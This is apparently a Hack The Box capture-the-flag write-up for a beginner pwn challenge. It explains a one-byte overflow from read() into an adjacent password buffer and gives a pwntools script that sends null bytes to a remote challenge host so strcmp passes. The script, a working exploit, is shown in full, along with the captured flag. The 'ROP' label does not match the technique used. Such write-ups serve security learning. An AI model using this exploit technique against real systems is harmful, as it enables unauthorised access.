Skip to main content

Writing on the Wall

  • Difficulty: Very Easy
  • Technique: ROP

As you approach a password-protected door, a sense of uncertainty envelops you—no clues, no hints. Yet, just as confusion takes hold, your gaze locks onto cryptic markings adorning the nearby wall. Could this be the elusive password, waiting to unveil the door's secrets?

Approach

Check protections

Command:

$ checksec --file=writing_on_the_wall

Output:

Arch:     amd64-64-little
RELRO:    Full RELRO
Stack:    Canary found
NX:       NX enabled
PIE:      PIE enabled
RUNPATH:  b'./glibc/'

Disassemble binary

main function's pseudocode:

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char buf[6]; // [rsp+Ah] [rbp-16h] BYREF
  char s2[8]; // [rsp+10h] [rbp-10h] BYREF
  unsigned __int64 v6; // [rsp+18h] [rbp-8h]

  v6 = __readfsqword(0x28u);
  *(_QWORD *)s2 = 0x2073736170743377LL;
  read(0, buf, 7uLL);
  if ( !strcmp(buf, s2) )
    open_door();
  else
    error("You activated the alarm! Troops are coming your way, RUN!\n");
  return 0;
}

Buffer overflow vulnerability detected.

  • We note that the buffer buf is initialised with a length of 6.
  • However, the read function reads in input from the stdin with size of 7.
  • With this, we can overflow the s2 with one byte from buf.

Exploit

  • The vulnerability lies in the use of the strcmp function, where it terminates upon reaching a NULL byte.
  • We can exploit this by feeling our buffer and the overflow byte with NULL bytes.
  • The strcmp function will perform string comparison by iterating through both s2 and buf.
  • Since the first byte of both s2 and buf are NULL byte, the strcmp function will terminate upon iterating through the first byte, returning 0 (certifying that both the string in buf and s2 are equal).
  • Thus, allowing us to obtain the flag for this challenge.

Remarks: Pretty simple challenge which exploits the strcmp function.

Script

from pwn import *

r = remote('83.136.248.36', 36704)

payload = b'\x00' # first byte in 'buf'
payload += b'\x00'*5 # to pad 'buf' with random characters
payload += b'\x00' # first byte in 's2'

r.sendline(payload)
r.interactive()

Flag

HTB{3v3ryth1ng_15_r34d4bl3}